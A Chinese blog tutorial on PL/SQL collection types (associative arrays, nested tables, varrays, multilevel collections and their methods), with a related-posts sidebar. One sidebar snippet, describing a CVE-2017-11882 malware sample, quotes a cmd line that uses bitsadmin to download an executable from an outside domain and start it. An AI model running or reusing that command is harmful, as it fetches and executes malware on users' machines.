文档章节

PLSQL集合类型

爱潜水的小八
 爱潜水的小八
发布于 2017/02/17 11:55
字数 764
阅读 3
收藏 0

PLSQL集合类型

 

--联合数组(索引表)

/*

用于存储某个数据类型的数据集合类型 。通过索引获得联合数组中得值

如下例子:

*/

DECLARE 

 CURSOR cur_chars IS SELECT chars FROM a;--声明游标

 TYPE str_type IS TABLE OF a.chars%TYPE--声明联合数组

 INDEX BY BINARY_INTEGER; --声明联合数组的索引

 strs str_type;--声明str_type 的联合数组strs

 counts INTEGER := 0;

BEGIN 

  FOR cur_chars_rec IN cur_chars LOOP

    counts := counts + 1;

    strs(counts) := cur_chars_rec.chars;

    dbms_output.put_line('counts('||counts||'):'||strs(counts));

  END LOOP;

END;

这个联合索引类型其实就是表数据的索引,定义游标然后把遍历到的结果存放在联合数组中,就相当于程序的基本数据类型数组

1.声明游标用来遍历表数据2.声明联合数组用来存储游标遍历的数据集3.声明索引

4.定义联合数组 联合数组名称 联合数组type

 

strs(counts) := cur_chars_rec.chars;  联合数组赋值命令

 

 

--嵌套表

/*

plsql表类型之一,他与联合数组具有相同的结构,都是使用下标访问数组

主要区别在于,嵌套表可以存储在数据库表的列中,而联合数组不行

*/

DECLARE

 CURSOR my_cursor IS SELECT chars FROM a WHERE NUM='ww' ;--定义游标

 TYPE table_type IS TABLE OF a.chars%TYPE;--声明表类型

 table_name table_type:=table_type();--定义并初始化嵌套表

 counts INTEGER := 1;

BEGIN

  FOR my_cursor_rec IN my_cursor LOOP

    counts := counts;

    table_name.extend;--表做成可扩展的***

    table_name(counts):=my_cursor_rec.chars;

    dbms_output.put_line('counts'||counts||' := '||table_name(counts));

  END LOOP;

END;

--创建变长数组

DECLARE

 TYPE varray_type IS ARRAY(10) OF NUMBER(6);

 varray_name varray_type := varray_type(); --变长数组同嵌套表相同都需要初始化收集

 counts INTEGER := 0;

BEGIN

  FOR i IN 1..5 LOOP

    counts := counts + 1;

    varray_name.extend;

    varray_name(counts) := i;--这个都是相同的使用下标

    dbms_output.put_line('counts('||counts||'):='||i);

  END LOOP;

END;

 

  varray_name.extend; 的使用超过范围的时候需要使用扩展

  集合函数的使用count 数量 first 第一个 last 最后一个

  Varrary_array.count Varrary_array.first  Varrary_array.last

  Varrary_array.trim(4) 从后往前删除4个数组元素

 

多层集合 集合作为集合的元素

变长数组为例 就相当于数据的嵌套

--多层集合(数组的嵌套)

DECLARE

 TYPE var_type1 IS VARRAY(5) OF INTEGER;--声明变长数组

 TYPE var_type2 IS VARRAY(3) OF var_type1;--声明多层集合,集合元素类型为var_type1

 varray_integer var_type1 := var_type1(1,2,3,4,5);--集合给初始值

 varray_multi var_type2 := var_type2(varray_integer);

 

BEGIN

  FOR i IN 1..5 LOOP

    dbms_output.put_line('varray_integer('||i||'):='||varray_integer(i));

  END LOOP;

  

  varray_multi.extend;

  varray_multi(2) := var_type1(6,7,8,9,10);

  

  varray_multi.extend;

  varray_multi(3) := var_type1(5,4,3,2,1);

  

  FOR i IN 1..3 LOOP

   FOR j IN 1..5 LOOP

         dbms_output.put_line('varray_multi['||i||']'||'['||j||']=='||varray_multi(i)(j));

   END LOOP;

  END LOOP;

END;

 

 

--集合的方法

DELETE --删除集合元素

EXTEND --为集合增加元素空间,实现空间的扩展以填充新元素。

COUNT --集合元素中的数量

EXISTS --如果指定的元素在集合中存在,则返回true

DELETE --删除指定集合位置的元素

FIRST AND  LAST --集合中的第一个和最后一个元素

PRIOR AND NEXT --返回集合指定位置的前一个和后一个元素

TRIM --从集合尾部删除元素

LIMIT --返回集合允许元素的最大数量

© 著作权归作者所有

共有 人打赏支持
爱潜水的小八
粉丝 4
博文 14
码字总数 9447
作品 0
大连
程序员
PLSQL集合笔记

针对多行单列的数据处理,用之前的标量变量肯定不行,这里引入一个新的数据类型复合数据类型。 这个复合类型类似于语言的数组struct[i],包括索引表,嵌套表,边长数组三种类型, 记住记录是...

aklaus
2017/08/04
0
0
Oracle之FORALL与BULK COLLECT简介

在上篇文章Oracle大数据的导入与更新方案中介绍了导入超大数据量的操作,而要批量更新超大数据量的操作时就需要用到本文所要介绍的FORALL与BULK COLLECT语句。 1 PL/SQL块的执行过程 当PL/SQ...

landy8530
03/17
0
0
【入门】plsql几种集合类型的区别

plsql中有3中集合类型。分别是可变长数组,嵌套表,关联表(索引表)。 简单的说下它们之间的区别。 1.type tnum is varray(100) of number(5); vnum tnum := tnum(1,2,3,4); 2.type tnum i...

shiwb
2013/04/23
0
0
PLSQL子程序即PLSQL块

PLSQL重头戏来了,前期介绍的四种变量,游标,集合,都是为后续的子程序服务的,子程序包括两类一个是函数,一个是存储过程, 1)建立和调用过程 2)建立和调用函数 3)管理PLSQL子程序 sqlp...

aklaus
2017/08/09
0
0
Oracle-14:PLSQL

------------吾亦无他,唯手熟尔,谦卑若愚,好学若饥------------- PL/SQL PL/SQL(Procedural Language):过程化sql语言! 在原本的sql语句之上,再增加一些逻辑或者循环等操作。 1:基本语法 ...

晨曦dawn
05/22
0
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

java并发api总结

1.java.util.concurrent包 1.1 Executors Executor:接口,仅有一个方法为execute(Runnable) ExecutorService:Executor的子接口,扩展了Executor的方法,如submit/shutdown等。 Executors:......

Funcy1122
20分钟前
0
0
cmd bat 下载并运行文件,来自cve-11882漏洞样本,eqnedit32.exe栈溢出

cmd.exe /c bitsadmin /transfer eH /priority foreground http://holdthatpaper33.com/abu_output774B940.exe %USERPROFILE%\cXUAQSZZXXCXzx.exe && start %USERPROFILE%\cXUAQSZZXXCXzx.ex......

simpower
34分钟前
1
0
Java 面向对象 之 对象数组

http://www.verejava.com/?id=16992784958543 /** 知识点: 对象数组 1. 对象数组的使用 2. 对象数组的foreach 增强for循环 3. 可变参数 题目:乘客...

全部原谅
35分钟前
1
0
超越时间和空间,带你到n维去!

我们处理三维问题十分自如,必要时对付四维问题也凑合。我们不费吹灰之力就能接受有实体和无限空间的三维世界。加上第四维时间后情况就有点复杂了。 但当我们开始研究包括再多或再少维数的世...

WeiXiaodong
46分钟前
0
0
通过ip获取真实地址

package util;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.JSONObject;import org.apache.commons.lang3.StringUtils;import org.apache.http.HttpResponse;......

lifes77
今天
3
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部